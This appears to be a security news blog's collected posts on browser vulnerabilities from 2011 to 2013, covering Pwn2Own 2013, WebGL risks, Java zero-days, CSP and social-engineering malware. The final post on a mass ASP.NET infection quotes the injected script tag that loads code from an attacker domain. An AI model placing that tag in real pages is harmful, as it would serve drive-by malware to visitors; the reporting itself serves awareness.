Showing posts sorted by relevance for query browsers. Sort by date Show all posts
Showing posts sorted by relevance for query browsers. Sort by date Show all posts

Pwn2Own 2013 Result: Chrome, Firefox, IE, Adobe Reader, Flash & Java Owned

Posted by Avik Sarkar On 3/11/2013 02:55:00 am

Pwn2Own 2013 Result: Chrome, Firefox, IE, Adobe Reader, Flash & Java Owned Only Safari Survived 

Couple of months ago we have talked about 'Pwn2Own 2013' hacking contest sponsored by HP TippingPoint, ZDI and Google where the most famous and widely used browsers have to face challenges. Now the result of this long awaited security competition has came which is showing that the entire browser security landscape can change in a single day, as browsers thought to be secure are proven to be otherwise. Of the Big Four browsers, only Apple's Safari has so far survived the onslaught of the browser-breakers where Chrome, Internet Explorer 10 and Firefox all fell to the mercy of the hackers. Not only browsers but also three other popular applications that is Adobe Reader, Flash Player and yet again Java fallen victim to hackers at 'Pwn2Own'. And for Java it was a true disaster as Java fell three times, though under the contest rules, only the first attacker was due to win the $20,000 prize. Vupen, a renowned security research firm based in France, cracked both Firefox and Internet Explorer. It roughly explained the attack in a tweet, “We’ve pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP.” This bug hint leads them winning $100,000 for finding a huge hole. Again in a tweet, Security firm Vupen explained “We’ve pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass.” Lastly, U.K.-based security firm MWR Labs cracked Chrome and also gained full control of the operating system, this time Windows 7. It also “demonstrated a full sandbox bypass exploit.” The company explained in a blog post that it found a zero-day in Chrome “running on a modern Windows-based laptop.” It was able to exploit the vulnerability by performing a very similar attack to what took down Facebook, Microsoft, and a number of other well-known companies: It had the laptop visit a malicious website. 

Now lets take look at the final score board of Pwn2Own 2013:

Wednesday:
1:30 - Java (James Forshaw) PWNED
2:30 - Java (Joshua Drake) PWNED
3:30 - IE 10 (VUPEN Security) PWNED
4:30 - Chrome (Nils & Jon) PWNED
5:30 - Firefox (VUPEN Security) PWNED
5:31 - Java (VUPEN Security) PWNED

Thursday:
12pm - Flash (VUPEN Security) PWNED
1pm - Adobe Reader (George Hotz) PWNED
2pm - Java (Ben Murphy via proxy) PWNED


The total damage to the prize fund comes out at a whopping $480k. With HP's announcement that everyone will get paid for each attack, the prize monies will be divvied up as follows:-

  1. James Forshaw: Java = $20K
  2. Joshua Drake: Java = $20k
  3. VUPEN Security: IE10 + Firefox + Java + Flash = $250k
  4. Nils & Jon: Chrome = $100k
  5. George Hotz: Adobe Reader = $70k
  6. Ben Murphy: Java = $20k
As you all know that the main motive of these contest is to make applications, software more safe and secure while figuring out hidden vulnerabilities  Here also for Pwn2Own the security holes figured out by the above experts have already been submitted and taken carefully by those organization  along with that, the expected patch for the browsers have already been released. Those who are still using the older version of those above applications are requested to update their system. So, stay tuned with VOGH and be safe on the Internet. 


 -Source (HP, Naked Security) 








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

WebGL is 'harmful' to security said Microsoft

Posted by Avik Sarkar On 6/17/2011 08:55:00 am



A security firm raised new concerns today about WebGL--but Microsoft piled on with an opinion that's likely more damaging to fans' hopes for a universal 3D Web graphics standard.
"We believe that WebGL will likely become an ongoing source of hard-to-fix vulnerabilities," Microsoft said today in a security blog post flatly titled "WebGL Considered Harmful." "In its current form, WebGL is not a technology Microsoft can endorse from a security perspective."
The move effectively kills WebGL fans' hopes, at least for now, that WebGL could become a standard Web programmers could count on finding in modern browsers. And that means one hot area of programming, games development, won't have an easy, unified way to tackle Web-based software.
WebGL was created initially at Mozilla, standardized by the Khronos Group, and supported by Google. It's built into Chrome and Firefox right now, giving those browsers a way to display hardware-accelerated 3D graphics useful for games and other visually rich tasks.
As with many technologies, though, the security scrutiny picks up once the technology leaves the labs and enters the real world. Today, Context Information Security, which issued a WebGL warning in May, issued another caution.

Specifically, Context publicized a problem that could let a Web site capture a screenshot of a Firefox user's computer, the company said in a blog post. It found the problem by checking Firefox with Khronos' WebGL conformance tests, which it said Firefox and Chrome don't pass. It also called insufficient Khronos' response to the earlier concern, employing a feature called GL_ARB_robustness.
"Context therefore recommends that users and system administrators disable WebGL," Context concluded.
Khronos downplayed the concerns in a statement from spokesman Jonathan Hirshon:
1. All browser vendors are still working toward passing the WebGL conformance suite. Only once they have successfully done so can they claim support of Canvas.getContext("webgl") instead of Canvas.getContext("experimental-webgl").
2. The issue of theft of arbitrary windows on the desktop is due to a bug in Firefox's WebGL implementation, and cannot be generalized across other browsers' WebGL implementations. Moreover, that bug was addressed May 26 and is resolved in Firefox 5, slated for release June 21.
3. Browser vendors are still in the process of supporting the GL_ARB_robustness extension, so it is expected that the previously reported denial-of-service issues are still present. It is expected that the reported denial-of-service issues will be solved with the integration of this extension.
Context's warnings are reinforced by the practical reality that Microsoft just wrote it off. The company has been frosty toward WebGL, but today it publicized Context's findings and explained why it views WebGL as unsafe.
Microsoft concluded that WebGL "would have difficulty passing Microsoft's Security Development Lifecycle requirements," a stance that seems likely to doom hopes at least for now that WebGL would become a standard supported by all major browsers. Universal support means that Web developers could count on WebGL being available and therefore could use it; its absence means that some Web sites and Web apps--Angry Birds for Chrome, for example--will require compatibility checks and fallbacks.
Among Microsoft's views on WebGL's security problems are the following:
The security of WebGL as a whole depends on lower levels of the system, including OEM [original equipment manufacturer] drivers, upholding security guarantees they never really [needed] to worry about before. Attacks that may have previously resulted only in local elevation of privilege may now result in remote compromise. While it may be possible to mitigate these risks to some extent, the large attack surface exposed by WebGL remains a concern...
As WebGL vulnerabilities are uncovered, they will not always manifest in the WebGL API itself. The problems may exist in the various OEM and system components delivered by IHVs [independent hardware vendors such as video card makers]. While it has been suggested that WebGL implementations may block the use of affected hardware configurations, this strategy does not seem to have been successfully put into use to address existing vulnerabilities. It is our belief that as configurations are blocked, increasing levels of customer disruption may occur...
Modern operating systems and graphics infrastructure were never designed to fully defend against attacker-supplied shaders and geometry [software that run on a graphics chip]. Although mitigations such as ARB_robustness and the forthcoming ARB_robustness_2 may help, they have not proven themselves capable of comprehensively addressing the DoS [denial of service] threat... If this problem is not addressed holistically it will be possible for any web site to freeze or reboot systems at will.
Don't expect WebGL to vanish, though. The movement toward Web apps is powerful, with notable allies. And some of Microsoft's concerns, such as the difficulties of assigning responsibility for plugging holes, aren't as bad outside the Windows PC world. Windows PCs use a vast array of hardware combinations, but Apple computers, Google Chromebooks, and new-generation smartphones don't.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

NSS Said : IE9 Blocks Virtually all Socially Engineered Malware, Rather Than Other Browsers

Posted by Avik Sarkar On 8/18/2011 04:28:00 pm


A study prepared by NSS Labs concludes that Microsoft's Internet Explorer 9 blocks virtually all socially engineered malware, far more than rival browsers.
The study was designed to examine one aspect of security: how a browser handled a malicious URL, such as one received in a posting on a social network or an email. The NSS goal was to find the browser which identified, warned, and/or blocked malicious URLs from being viewed by the user.
As it did in 2010, Microsoft's IE9 with Smart Screen URL detection and Application Reputation topped the field, blocking 99.2 percent of all malicious emails. Google's Chrome 12 finished far behind, blocking 13.2 percent of all malicious URLs. Apple's Safari 5 and Mozilla Firefox 4 tied at 7.4 percent, with Opera 11 finishing dead last at 6.1 percent.

 

The NSS Labs study showed that, globally, all of the browsers tested showed improvement over an NSS study performed last year, with two exceptions: Safari and Mozilla's Firefox. A year ago, Microsoft IE9 blocked 99 percent of the malicious URLs, followed by Chrome 6 (3%), Safari 5 (11%), Firefox 3.6.15 (19%), and Opera 10 (0%).
NSS attributed Microsoft's success to its Application Reputation technology, which has attempted to categorize applications across the Internet.
"The significance of Microsoft's new application reputation technology cannot be overstated," the NSS report found. "Application reputation is the first attempt by any vendor to create a definitive list of every application on the Internet. This new capability helps users discern malware, and potentially unsafe software from actual good software. The list is dynamically created and maintained, much the same way Google, (or Bing) is continuously building and maintaining a library of content for search purposes."
The NSS tests sliced the potential for malware along one specific axis, socially engineered malware, a distinction Google objected to during the 2010 tests. ""Google Chrome was built with security in mind from the beginning and emphasizes protection of users from drive-by downloads and plug-in vulnerabilities," a spokeswoman said then.
NSS also found that the combination of SmartScreen and Application Reputation means that IE9 blocked new malware in just over half and hour, while Safari 5 and Firefox 4 required 4.91 and 6.07 hours, on average, to detect a new malicious URL. Chrome 12 and Opera 11, by contrast, required 17.7 and 18.4 hours, respectively. Over time, as the malicious URLs changed in response to detection, the browsers maintained their level of protection fairly consistently, NSS found.
"Not only has the effectiveness of the technology improved, but so has the speed at which it is able to identify socially engineered malware," Roger Capriotta, director of Internet Explorer product marketing, wrote in a blog post Monday. "For our Windows customers, this means fewer infections and headaches for you."
In its report, NSS said its findings were independent, and that it had not received funding from any vendor. 

-News Source (PC Mag)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

DHS & US-CERT Recommended to Disable Java in Web Browsers

Posted by Avik Sarkar On 1/18/2013 06:49:00 pm

DHS & US-CERT Recommended to Disable Java in Web Browsers Unless It's Absolutely Necessary

The running time is proving to be the worst period for Java, as it has been walking under serious security issues. Yet again security researchers have pointed out a zero-day security vulnerability in the Java program that hackers are exploiting. The exploit takes advantage of a vulnerability left open in Java 7 Update 10, released in October last year. It works by getting Java users to visit a website with malicious code that takes advantage of a security gap to take control of users' computers. Thus how Java is being used by cyber criminals to infect computers with malware. Oracle, hasn't specified the number of users who have downloaded Java 7 Update 10. However, Java runs on more than 850 million computers and other devices. When Oracle released Update 10, so it is predictable that more than 850 million devices run by Java is under threat. The exploit was first discovered by French researcher Kafeine, who claimed to have found it running on a site registering hundreds of thousands of page views daily. From that site, immediately that vulnerability and a large number of effected devices has been spotted in the wild. In Java 7 Update 10 the creator of Java, Oracle added several security control and fixed older bugs and promised more security enhancement, but its very unfortunate that Oracle failed to keep their promise. What ever after this newly discovered 0-day hole spotted wildly, Oracle Security Alert CVE-2013-0422 states that Java 7 Update 11 addresses this (CVE-2013-0422) and an equally severe, but distinct vulnerability (CVE-2012-3174). Immunity has indicated that only the reflection vulnerability has been fixed and that the JMX MBean vulnerability remains. Java 7u11 sets the default Java security settings to "High" so that users will be prompted before running unsigned or self-signed Java applets. It "strongly recommends" that Java SE 7 users upgrade immediately to avoid all kind of security hazards. 

After seeing all the drama, many of you have failed to keep trust in Java, and you all will be relieved when you will gone through the security advisory of CERT (Computer Emergency Response Team) where they have clearly instructed to disable Java in your popular web-browser. In their official release CERT said "Unless it is absolutely necessary to run Java in web browsers, disable it as described below, even after updating to 7u11. This will help mitigate other Java vulnerabilities that may be discovered in the future."

You will see similar advice in the advisory posted on the official DHS US-CERT website where DHS also suggested to disable Java until and unless it is that much necessary. "To defend against this and future Java vulnerabilities, consider disabling Java in web browsers until adequate updates are available. As with any software, unnecessary features should be disabled or removed as appropriate for your environment." - said U.S. CERT in their advisory. 






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Browser history vulnerable to JavaScript snooping

Posted by Avik Sarkar On 4/25/2011 01:00:00 am

Despite many of us willingly letting the online world have regular glimpses into our so-called private lives through social media portals, most would cry foul if such information was collected without our consent or knowledge. Researchers have just completed a study of scripting code contained within the documents used to display web pages in browsers and found evidence of something called history sniffing. This is where website owners gain access to browser history to track your progress around the web.
There's been quite a lot of discussion of late about the privacy issues surrounding history sniffing but the study by researchers from Jacobs School of Engineering at the University of California, San Diego is believed to be the first empirical analysis of history sniffing online.
"Nobody knew if anyone on the Internet was using history sniffing to get at users' private browsing history. What we were able to show is that the answer is yes," said University of California, San Diego computer science professor Hovav Shacham.

Colorful history

You may have noticed when hopping from site to site around the web that some links are shown in blue and others in purple. The former color is often used to indicate site yet to be visited and the latter, those which you've already been to. Some websites are embedded with special JavaScript code that has a sneaky peek at the browser history and looks for evidence of that color change to record where you've been recently.
This information can then be used by website owners to check if you've been comparing their page or products with any competitors and develop an appropriate marketing strategy. For instance, say you're shopping for a new laptop and are looking to compare prices. If you land on a web page that's using the JavaScript sniffing code, the owner of that page would be able to learn which competitors you've been checking out - without your knowledge – and perhaps adjust pricing to suit.
Nothing wrong with that, you might say, helps to push prices down and encourages competition to the benefit of consumers. Well, yes – it could all be quite innocent but what if the code was used by some unsavory character to build user profiles for phishing scams? If someone were to learn which online banking service you used for example, then a fake page could be set up and an authentic-looking email sent to your webmail Inbox. You then click on the link and there goes your login details.
University of California, San Diego's computer science professor Sorin Lerner said: "We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack."

Identifying the sniffers

The dynamic flow engine for JavaScript was developed by Ph D student Dongseok Jang and used by the researchers to crawl through the top-ranked websites, according to Alexa global website rankings. The tool analyzed the code running on a web page and identified and tagged all instances where the browser history was being checked. They found that 485 of the 50,000 sites checked used code to inspect the style properties that can be used to infer the browser's history.
Although most of the tagged information never got sent over the network back to company servers, the researchers "confirmed that 46 of them are actually doing history sniffing, one of these sites being in the Alexa global top 100." What was done with the data once it got back to the website owners is not known.
While not posing as significant a risk to privacy as, say, malware or session hijacking, Stracham said that "history sniffing is unusual in effectively allowing any site you visit to learn about your browsing habits on any other site, regardless if the two sites have any business relationship."
He thinks that "people who have updated or switched browsers should now worry about things other than history sniffing, like keeping their Flash plug-in up to date so they don't get exploited. But that doesn't mean that the companies that have engaged in history sniffing for the currently 60 percent of the user population that is vulnerable to it should get a free pass."

Keeping up to date

The researchers point out that the latest versions of some browsers – such as Firefox, Chrome and Safari – now block history sniffing, but others (most notably Internet Explorer) do not. They recommend keeping up to date with the latest versions of web browsers to make sure that you benefit from any newly implemented security measures.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Flash Zero-day Exploit Which Allowing Others To Use Your Webcam Has Been Patched

Posted by Avik Sarkar On 10/23/2011 05:15:00 pm


A Stanford University student recently discovered a security flaw with Adobe’s Flash Player that allowed malicious users to activate your webcam and microphone without your knowledge. They could then tap into the video and audio to watch and listen to your every move. OK, that sounded a lot less sensationalist in my head. Unfortunately, up until a few days ago, this exploit very much existed and Adobe was working feverishly on a fix. Feross Aboukhadijeh, the aforementioned Stanford student, wrote about the flaw on October 18.
According to Feross Aboukhadijeh:-
"I discovered a vulnerability in Adobe Flash that allows any website to turn on your webcam and microphone without your knowledge or consent to spy on you. It works in all versions of Adobe Flash that I tested. I’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux)."
Video Demo:-


Later Adobe issued a critical update for its Flash Player software. The patch fixes six security vulnerabilities, at least one of which is a zero-day vulnerability being actively exploited in the wild. The details of the Adobe security bulletin explain, "This update resolves a universal cross-site scripting issue that could be used to take actions on a user's behalf on any website or webmail provider if the user visits a malicious website (CVE-2011-2444)," adding, 
"Note: There are reports that this issue is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious link delivered in an email message."
The zero-day bug fixed today is similar to a flaw in Flash that was patched in June. Coincidentally, both the June vulnerability, and this one patched today were reported to Adobe by Google.

To download the Patch and more about Adobe Security Bulletin Click Here 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

0-day Vulnerability Found in Java Spotted in the Wild

Posted by Avik Sarkar On 8/30/2012 01:39:00 am

0-day Vulnerability Found in Java Spotted in the Wild

Yet another 0-day vulnerability found by FireEye's Malware Intelligence Lab that affects all the latest version of Java , including the current Java 7 update 6, are also vulnerable to the hole that is already being exploited in the wild. With the publication of a vulnerability notice by the US-CERT and warnings from the German BSI (Federal Office for Information Security), the best advice for all users is to disable Java applets in their browsers on all operating systems. The vulnerability can be exploited when a user visits a specially crafted web site and can be used to infect a system with malware. The code to exploit the problem is already available on the internet, making its use for infecting systems very likely. There is no patch available for the flaw so it is essential that users disable the Java plugins used by their browsers. Instructions for the various browsers can be found below:


Several security firms have already declared that, this newly found Java exploit had been added to Blackhole, a popular hacker's tool that bundles numerous exploits and tries each in turn until it finds one that will work against a personal computer. "Exploit code for the Java vulnerabilities has been added to the most prevalent exploit kit out there, Blackhole," said Websense in a short post on its company blog. The addition of the exploit to Blackhole was cited by FireEye researcher Atif Mushtaq in a similar blog entry yesterday as the basis for a spike in attacks. "After seeing the reliability of this attack, I have no doubt in my mind that within hours the casualties will be in the thousands," said Mushtaq.


-Source (The-H, CW)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Firefox 4 Supports Content Security Policy

Posted by Avik Sarkar On 5/09/2011 01:58:00 pm


Content Security Policy is a standard developed by Mozilla designed to protect against cross sitescripting (XSS) attacks. Cross site scripting attacks use vulnerabilities in websites to inject JavaScript code into pages or urls of that site. The injected JavaScript code is then executed when visitors open a specifically prepared link or page on the website. Attacks can have serious consequences, it may for instance be possible to steal cookies from users to impersonate them on the site.
Content Security Policy has been in development for quite some time.. The basic idea behind the standard is to give webmasters a tool at hand to whitelist JavaScript, and other objects and files, that may be executed on the site. This implementation blocks all JavaScript code that is executed on the site and not in the list of allowed sites, which means that attackers cannot exploit possible XSS vulnerabilities on the website or server.
A browser supporting CSP ignores code that is not in the whitelist. Browsers who do not support CSP ignore the policy.

Content Security Protection for Users

CSP is currently only supported by Firefox 4, Thunderbird 3.3 and SeaMonkey 2.1. You can test the functionality by visiting this test page.
Twitter recently announced that they have added CSP to their mobile version, accessible under mobile.twitter.com. Users who use one of the aforementioned browsers are protected from XSS attacks on that website.
The engineers on Twitter removed all JavaSCript from code and implemented the CSP header. They then restricted the header to Firefox 4 users and created a rule set to allow JavaScript from their assets. This included the content deliver network used to deliver stylesheets and user profiles.
Unexpected issues were encountered by the developers. They noticed for instance that some Firefox add-ons were inserting JavaScript on page load, which triggered a threat report. The Twitter engineers noticed furthermore that some ISPs inserted JavaScript code or altered image tags for caching reasons.
They managed to resolve those problems by mandating SSL for all Firefox 4 users who access the mobile Twitter web site.
x-content security policy
A test with Firebug shows that the mobile version of Twitter is indeed using the policy on site. Please note that Twitter makes a user agent check and is very restrictive about it. Firefox 5 or Firefox 6 users won’t get the policy currently.

Content Security Protection for Webmasters

Webmasters may have some work at hand to add support for CSP to their website. JavaScript code that is directly embedded in documents will not be executed anymore, which has several implications. Webmasters need to move the code to external JavaScript files.
Policies are specified with the X-Content-Security-Policy header. The header X-Content-Security-Policy: allow ‘self’ *.ghacks.net for instance allows JavaScript to be loaded from ghacks.net and all subdomains of ghacks.net.
The using CSP guide on Mozilla offers additional examples on how to set the right headers.
Browsers that do not support CSP ignore the header.
CSP offers two additional forms of protection. It mitigates clickjacking attacks. Clickjacking refers to directing a user’s mouse click to a target on another site. This is often done by using transparent frames on the original website.
Content Security Policy can also be used to mitigate packet sniffing attacks, as it allows the webmaster to specific protocols that are allowed to be used. It is for instance possible to force HTTPS only connections.
The CSP Policy directives are accessible here on Mozilla.
Next to the already mentioned options are parameters to specific hosts where images, media files, objects or fonts may be loaded from.
Plugins are available for WordPress and Drupal that add the policy to supported websites automatically when activated.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Every 14 Programs Downloaded by Windows Users Turns out to be Malicious

Posted by Avik Sarkar On 5/18/2011 11:06:00 pm


The next time a website says to download new software to view a movie or fix a problem, think twice. There's a pretty good chance that the program is malicious.
In fact, about one out of every 14 programs downloaded by Windows users turns out to be malicious, Microsoft said Tuesday. And even though Microsoft has a feature in its Internet Explorer browser designed to steer users away from unknown and potentially untrustworthy software, about 5 percent of users ignore the warnings and download malicious Trojan horse programs anyway.
Five years ago, it was pretty easy for criminals to sneak their code onto computers. There were plenty of browser bugs, and many users weren't very good at patching. But since then, the cat-and-mouse game of Internet security has evolved: Browsers have become more secure, and software makers can quickly and automatically push out patches when there's a known problem.
So increasingly, instead of hacking the browsers themselves, the bad guys try to hack the people using them. It's called social engineering, and it's a big problem these days. "The attackers have figured out that it's not that hard to get users to download Trojans," said Alex Stamos, a founding partner with Isec Partners, a security consultancy that's often called in to clean up the mess after companies have been hacked.
Social engineering is how the Koobface virus spreads on Facebook. Users get a message from a friend telling them to go and view a video. When they click on the link, they're then told that they need to download some sort of video playing software in order to watch. That software is actually a malicious program.
Social-engineering hackers also try to infect victims by hacking into Web pages and popping up fake antivirus warnings designed to look like messages from the operating system. Download these and you're infected. The criminals also use spam to send Trojans, and they will trick search engines into linking to malicious websites that look like they have interesting stories or video about hot news such as the royal wedding or the death of Osama bin Laden.
"The attackers are very opportunistic, and they latch onto any event that might be used to lure people," said Joshua Talbot, a manager with Symantec Security Response. When Symantec tracked the 50 most common malicious programs last year, it found that 56 percent of all attacks included Trojan horse programs.
In enterprises, a social-engineering technique called spearphishing is a serious problem. In spearphishing, the criminals take the time to figure out who they're attacking, and then they create a specially crafted program or a maliciously encoded document that the victim is likely to want to open -- materials from a conference they've attended or a planning document from an organization that they do business with.

With its new SmartScreen Filter Application Reputation screening, introduced in IE 9, Internet Explorer provides a first line of defense against Trojan horse programs, including Trojans sent in spearphishing attacks.
IE also warns users when they're being tricked into visiting malicious websites, another way that social-engineering hackers can infect computer users. In the past two years, IE's SmartScreen has blocked more than 1.5 billion Web and download attacks, according to Jeb Haber, program manager lead for SmartScreen.
Haber agreed that better browser protection is pushing the criminals into social engineering, especially over the past two years. "You're just seeing an explosion in direct attacks on users with social engineering," he said. "We were really surprised by the volumes. The volumes have been crazy."
When the SmartScreen warning pops up to tell users that they're about to run a potentially harmful program, the odds are between 25 percent and 70 percent that the program will actually be malicious, Haber said. A typical user will only see a couple of these warnings each year, so it's best to take them very seriously.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Mass ASP.NET Infection Ongoing, So Far 614,000 Web-Pages Affected

Posted by Avik Sarkar On 10/15/2011 04:59:00 pm


An infection that causes poorly configured websites to silently bombard visitors with malware attacks has hit almost 614,000 webpages, Google searches show.
The mass infection, which redirects users to a site exploiting old versions of Oracle's Java, Adobe's Flash player and various browsers, was first disclosed by Armorize on Wednesday. At the time, it appeared to affect about 180,000 pages. 


By time of writing on Friday, the initial attack and a follow-on exploit has spread to 613,890 combined pages. The SQL injection attack mostly exploits websites running Microsoft's ASP.Net web application framework.
The infection injects code into websites operated by restaurants, hospitals, and other small businesses and plants an invisible link in visitors' browsers to sites including jjghui.com and nbnjkl.com. Those sites in turn redirected to several other websites that include highly obfuscated code. At the end of the line is a cocktail of attacks that exploit known vulnerabilities in Java and the other targeted programs. Computers running unpatched versions are then commandeered. Servers in the attack used IP addresses based in the US and Russia.

To Download the Script Click Here 

The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser. In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).
This wave of mass injection incident is targeting ASP ASP.NET websites. Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

ASP and ASP.NET websites are injected with the following script (Text is Here):
<script src=http://jjghui.com/urchin.js></script>
 
 



-News Source (The Register & Armorize Blog)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search